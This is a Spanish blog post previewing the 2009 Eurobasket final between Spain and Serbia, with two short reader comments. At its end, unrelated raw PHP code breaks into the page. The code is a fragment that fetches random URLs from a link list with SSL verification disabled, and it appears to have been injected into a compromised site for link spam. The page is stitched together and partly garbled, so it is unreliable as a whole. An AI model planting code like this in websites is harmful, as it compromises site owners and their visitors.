EuroNBAsket: A la final

20 de September de 2009 por txusma

La final de Eurobasket 2009 la jugarán España y Serbia. 2 equipos con historias diferentes. España era, sin duda, la gran favorita para alzarse con el triunfo desde el primer momento, pero una mala primera fase (con derrota frente a Serbia incluída) llenó de dudas el corazón de los aficionados. La derrota frente a Turquía, sumadas a las famosas declaraciones de Marc Gasol no hacían presagiar nada bueno, pero el partido frente a Lituania y sobretodo ese parcial de 23-0, despertó al equipo que todos conocíamos. Desde ese momento, los encuentros se cuentan no por victorias, sino por palizas, demostrando una superioridad casi insultante sobre sus rivales. Polonia, Francia y ayer, Grecia ya han sucumbido bajo el rodillo español. De nuevo la defensa y Pau Gasol fueran las principales armas de la selección que volvió a secar (grandes Ricky y Cabezas) al principial peligro del equipo contrario. Si hace 3 días era Tony Parker, ayer el que lo sufrió en sus carnes fue Spanoulis. Con Rudy Fernández fenomenal en ataque y defensa, los rebotes de Felipe Reyes y los destellos de Cabezas y Mumbrú fue suficiente para doblegar a una Grecia superada en todo momento pero que fue capaz de coger 24 rebotes en ataque. Punto a mejorar de cara a la final.

Serbia, en cambio, llegaba al europeo sin nigún tipo de presión inmersa en un cambio generacional, que a priori, no tenía que dar resultados inmediatos. Stojakovic, Milicic, Jaric, etc… ya no estaban y el equipo estaba liderado por el NBA Nenad Krstic que, rodeado por jugadores muy jóvenes, se presentaban al Europeo con el objetivo de seguir consolidándose y crecer. Pero en el primer partido ganaron a España lo que les llenó de moral y les hizo creer en sus posibilidades. En cuartos derrotaron a Rusia y ayer a Eslovenia, de la mano de un Teodosic que rezuma clase por los 4 costados. Suyo fue el triple que empataba el partido a 20 segundos para el final y suyos fueron también 8 de los puntos que Serbia anotó en la prórroga camino de la victoria. Krstic y Perovic anotaron 18 puntos cada uno, demostrando que Serbia posee un arsenal muy variado y que habrá que estar muy atentos.

Viendo como ha jugado España los últimos partidos lo más normal es pensar que vencerá en la gran final con suficiencia, que Teodosic se ahogará en la maraña de brazos españoles y que los serbios se tendrán que contentar con la medalla de plata. Pero la selección balcana llega sin ningún tipo de presión y con los objetivos más que cumplidos y será muy peligrosa. Si España (y Pau Gasol) empiezan bien no habrá partido. Si no, habrá que sufrir un poco más.

Comenta

2 comentarios a esta entrada

  1. arivas dice:
    #1

    Enorme Teodosic, ha sido una demostración grandiosa. Mucho ojito con esta generación Serbia que puede dar mucho que hablar. Teodosic,, Velickovic, Tepic, Bjelica,Tripkovic, Macvan… mucho futuro.

      Citar

  2. Txusma dice:
    #2

    Vaaamos!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>